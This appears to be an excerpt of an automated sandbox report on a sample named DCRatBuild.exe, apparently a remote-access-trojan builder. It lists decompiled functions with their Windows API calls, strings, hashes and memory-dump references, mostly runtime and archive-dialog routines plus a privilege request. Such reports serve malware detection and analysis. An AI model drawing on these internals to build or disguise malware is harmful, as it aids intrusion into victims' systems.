Instruction ID: 943f1589f4dfddeb0d237f062a7ee49048eae4bcfa3861d606a812467c5f2e19
Opcode Fuzzy Hash: 9b6fcc5167bee92ed90a7b89f42f6116921aa0cc6dda50fc3cb9f561351d96d6
Instruction Fuzzy Hash: 2B41C232A003089FEB24DF78C881A6EB7A5FF89714F5545A9E615EB341DB31ED01CB81

Function 008FB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 008FB619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008FB63C

Part of subcall function 008F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008FC13D,00000000,?,008F67E2,?,00000008,?,008F89AD,?,?,?), ref: 008F854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 008FB662
_free.LIBCMT ref: 008FB675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 008FB684

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 21a1527270a4fd7ea3847115ac7efdbc8dda0cfdfea032eca020759ec4a5b4e8
Instruction ID: 1415069cd83812ff8dc8a93c3614944403e8db852459bcbdebaa917fe02e7268
Opcode Fuzzy Hash: 21a1527270a4fd7ea3847115ac7efdbc8dda0cfdfea032eca020759ec4a5b4e8
Instruction Fuzzy Hash: 480184B2605619BF6321167AAC8CC7B6A6DFEDABA43254229BA04C7110DF64CD0195B1

Function 008F9029 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,008F895F,008F85FB,?,008F8FD3,00000001,00000364,?,008F3713,00000050,?,00910EE8,00000200), ref: 008F902E
_free.LIBCMT ref: 008F9063
_free.LIBCMT ref: 008F908A
SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F9097
SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F90A0

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: de19bd860408fb874ed4c1961de0603b0bbace8698908deccb2ccf8d7a869619
Instruction ID: 0f5bd4db40d8dfaca3923c195e60cf7b54b71998a72549cf351defbaad965119
Opcode Fuzzy Hash: de19bd860408fb874ed4c1961de0603b0bbace8698908deccb2ccf8d7a869619
Instruction Fuzzy Hash: 3501F472509E0CAFC3226779AC85B3B262DFBD03757240024F759D2252EE64CC016566

Function 008E075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 008E0A41: ResetEvent.KERNEL32(?), ref: 008E0A53
Part of subcall function 008E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 008E0A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 008E078F
CloseHandle.KERNEL32(?,?), ref: 008E07A9
DeleteCriticalSection.KERNEL32(?), ref: 008E07C2
CloseHandle.KERNEL32(?), ref: 008E07CE
CloseHandle.KERNEL32(?), ref: 008E07DA

Part of subcall function 008E084E: WaitForSingleObject.KERNEL32(?,000000FF,008E0A78,?), ref: 008E0854
Part of subcall function 008E084E: GetLastError.KERNEL32(?), ref: 008E0860

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 81231512d2c766f9419fe8fb0d054d21dafe8f22822a50a12bbaf075dfda2862
Instruction ID: 03a198a0bd2b53419eb5e4fb968735d3eba6651e6467d63b50ffc06c843db394
Opcode Fuzzy Hash: 81231512d2c766f9419fe8fb0d054d21dafe8f22822a50a12bbaf075dfda2862
Instruction Fuzzy Hash: FE01B571444744EFC7219B69DC84FC6BBFDFB4A710F008929F15A82160CBB66A44DF90

Function 008FBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008FBF28

Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506

_free.LIBCMT ref: 008FBF3A
_free.LIBCMT ref: 008FBF4C
_free.LIBCMT ref: 008FBF5E
_free.LIBCMT ref: 008FBF70

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fcaeb58d9e88c76a5a80ed162a282bbc0dbc6a28935bd322581e0dd660bd17f7
Instruction ID: b7bcd1a5da94259a1a4d045ff920c63b2e4927ca432411df6662ac748db68874
Opcode Fuzzy Hash: fcaeb58d9e88c76a5a80ed162a282bbc0dbc6a28935bd322581e0dd660bd17f7
Instruction Fuzzy Hash: 63F0F933518609EBC720EB78EE86C2A73E9FA107107644C49F209D7950CF20FC809E69

Function 008EAC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008EAC85
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008EAC96
IsDialogMessageW.USER32(00010494,?), ref: 008EACAA
TranslateMessage.USER32(?), ref: 008EACB8
DispatchMessageW.USER32(?), ref: 008EACC2

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 57d074a6548ec5c7bd2ec1d9aa11f54dd63ac627b19173d8a43be000b299a311
Instruction ID: b5bf2898e1073014939628e418c0f5765b7093bb817c34eb0b3d8f5e3a77fab2
Opcode Fuzzy Hash: 57d074a6548ec5c7bd2ec1d9aa11f54dd63ac627b19173d8a43be000b299a311
Instruction Fuzzy Hash: 95F03071D15229AB8B249BE2EC4CDEB7F6CEF066517404415F405D2150EB34E509DBB1

Function 008F8060 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008F807E

Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506

_free.LIBCMT ref: 008F8090
_free.LIBCMT ref: 008F80A3
_free.LIBCMT ref: 008F80B4
_free.LIBCMT ref: 008F80C5

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 814abc74c147ecfe3182d2d5611f7ba73ed7d6810059c1303e6c2a50ba64c6a9
Instruction ID: 9f93567e2614005241b48f09a5520d2cb1981216fdb801d9fa6d8c589f3b4d4b
Opcode Fuzzy Hash: 814abc74c147ecfe3182d2d5611f7ba73ed7d6810059c1303e6c2a50ba64c6a9
Instruction Fuzzy Hash: 80F05EB5829629CFC7116F39BC024263BA5FB247203184A4AF610D7AB0CF310851BFC6

Function 008F76BD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\DCRatBuild.exe,00000104), ref: 008F76FD
_free.LIBCMT ref: 008F77C8
_free.LIBCMT ref: 008F77D2

Strings

C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, xrefs: 008F76F4, 008F76FB, 008F772A, 008F7762

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
API String ID: 2506810119-119056061
Opcode ID: 0097f7ad720923bb24a901ba54ab41f41abd5a71aa8f522161aff650d1c1707b
Instruction ID: c3d6b732032a39f1248f39f8391eae5557723b9814a1ed86c1db3d9fd0b79439
Opcode Fuzzy Hash: 0097f7ad720923bb24a901ba54ab41f41abd5a71aa8f522161aff650d1c1707b
Instruction Fuzzy Hash: 42318F71A1821CEFEB21EFA9DC819BEBBECFB94314B2440A6E604D7211D6704E40DB91

Function 008D7574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 008D7579

Part of subcall function 008D3B3D: __EH_prolog.LIBCMT ref: 008D3B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 008D7640

Part of subcall function 008D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 008D7C04
Part of subcall function 008D7BF5: GetLastError.KERNEL32 ref: 008D7C4A
Part of subcall function 008D7BF5: CloseHandle.KERNEL32(?), ref: 008D7C59

Strings

SeRestorePrivilege, xrefs: 008D75D3
SeSecurityPrivilege, xrefs: 008D75BE

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 9b2743e1450dca4f90f992ed62c204ac3fc660aa8aff6647e7563641813c49d6
Instruction ID: fc87a12ccf2f8ac30b87a95d93614d81f1966ef3682c2c98d562ed2d1651b760
Opcode Fuzzy Hash: 9b2743e1450dca4f90f992ed62c204ac3fc660aa8aff6647e7563641813c49d6
Instruction Fuzzy Hash: C931A671908248AEDF20EB69EC45BEE7B78FF55354F004256F444E7252EBB18944CB62

Function 008EA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365

EndDialog.USER32(?,00000001), ref: 008EA4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 008EA4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 008EA4E2

Strings

ASKNEXTVOL, xrefs: 008EA448

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: f75a67c836342e78b580d5052e8ea33c3127d7428d8ce7d2fab833d10c4bf30a
Instruction ID: 0d05e70896b1a7fddf38f822199808668820c5823076c18516de4ee52d109c47
Opcode Fuzzy Hash: f75a67c836342e78b580d5052e8ea33c3127d7428d8ce7d2fab833d10c4bf30a
Instruction Fuzzy Hash: 55119632258280BFDB259F99DD4DF6637A9FB87B08F104115F241DB1E0C7A1A905EB2B

Function 008DD1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 008DD22E
_strncpy.LIBCMT ref: 008DD278

Strings

@%s, xrefs: 008DD218
$%s, xrefs: 008DD223

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 516707569e86a8cfdddec84fff5cad69f45f6e21aa43817f1d508f972380684e
Instruction ID: 0b620bc8ab5d1e8fe6fa229981fee7de707889fa6271a60a6b1cb1b5648b7a85
Opcode Fuzzy Hash: 516707569e86a8cfdddec84fff5cad69f45f6e21aa43817f1d508f972380684e
Instruction Fuzzy Hash: B1213B7244034CAEDF209EA8CC46FEE7BA8FB05700F044622FA25D6292E771EA559B51

Function 008EA990 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365

EndDialog.USER32(?,00000001), ref: 008EA9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 008EA9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 008EAA24

Strings

GETPASSWORD1, xrefs: 008EA9A9

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 9eac97f066e18fec7d2426433d3d37980a3e2a650bddee9e861c8fc85995b5fb
Instruction ID: 40651b6cd83f32f5583b288f7d5c6de41c5652d6a82acd6804b335556f157ea7
Opcode Fuzzy Hash: 9eac97f066e18fec7d2426433d3d37980a3e2a650bddee9e861c8fc85995b5fb
Instruction Fuzzy Hash: 1F1148329542287ADB35AE669D09FFB3B7CFB4AB00F000021FA45F6181C260A954D672

Function 008DB4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 008DB51E

Part of subcall function 008D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008D401D

_wcschr.LIBVCRUNTIME ref: 008DB53C
_wcschr.LIBVCRUNTIME ref: 008DB54C

Strings

%c:\, xrefs: 008DB514

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: d61b5cac74bf88d379c8ff051503ee052263e7b4c93012c0eebb04c832eb737b
Instruction ID: 38637cb3c679dc09afc7c18df3007c7a652239a087d729d94577368440d77221
Opcode Fuzzy Hash: d61b5cac74bf88d379c8ff051503ee052263e7b4c93012c0eebb04c832eb737b
Instruction Fuzzy Hash: 3801F953904711FADB20ABB9AC46C7BB7BCFE953A07914617F945C6281FB30D950C2A2

Function 008E06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,008DABC5,00000008,?,00000000,?,008DCB88,?,00000000), ref: 008E06F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,008DABC5,00000008,?,00000000,?,008DCB88,?,00000000), ref: 008E06FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,008DABC5,00000008,?,00000000,?,008DCB88,?,00000000), ref: 008E070D

Strings

Thread pool initialization failed., xrefs: 008E0725

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 086fcbdbac948507444ededba3f34c518bdc70243b2e490ae83e419e45102bee
Instruction ID: 503ac53a2eb5bb9fd3e486e196e78a8d306db47999e876fdcc375ec8fb30c36f
Opcode Fuzzy Hash: 086fcbdbac948507444ededba3f34c518bdc70243b2e490ae83e419e45102bee
Instruction Fuzzy Hash: 62115EB1605709AFD3215F6A9C84AA7FBECFBA5754F10882EF1DAC6200D6B16981CF50

Function 008ED38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 008ED3C9, 008ED3FD
RENAMEDLG, xrefs: 008ED3DE

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 47485d4d77dde15d2db5066c36782e2cb1491178b1b25fabc77cde5e22390df7
Instruction ID: 339eb22147198d40e71107645dc68d8584101f7f7653b46d55798eda2cfe0387
Opcode Fuzzy Hash: 47485d4d77dde15d2db5066c36782e2cb1491178b1b25fabc77cde5e22390df7
Instruction Fuzzy Hash: B301B1B1A2838AAFCB119F16ED44A977BE9F716384B008421F905D22B1DA719C54FBA1

Function 008F91DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 008F9269
__alldvrm.LIBCMT ref: 008F946A
__alldvrm.LIBCMT ref: 008F948C

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction ID: 1e425bb89ac7b263352b9e6bb8630b9fe650eff4e0324a35634413753f527f6e
Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction Fuzzy Hash: 33A14432A0028E9FDB258E78C8917BEBBA5FF65310F144169E6D5DB381C2388942C755

Function 008DA2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,008D80B7,?,?,?), ref: 008DA351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,008D80B7,?,?), ref: 008DA395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,008D80B7,?,?,?,?,?,?,?,?), ref: 008DA416
CloseHandle.KERNEL32(?,?,00000000,?,008D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 008DA41D

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

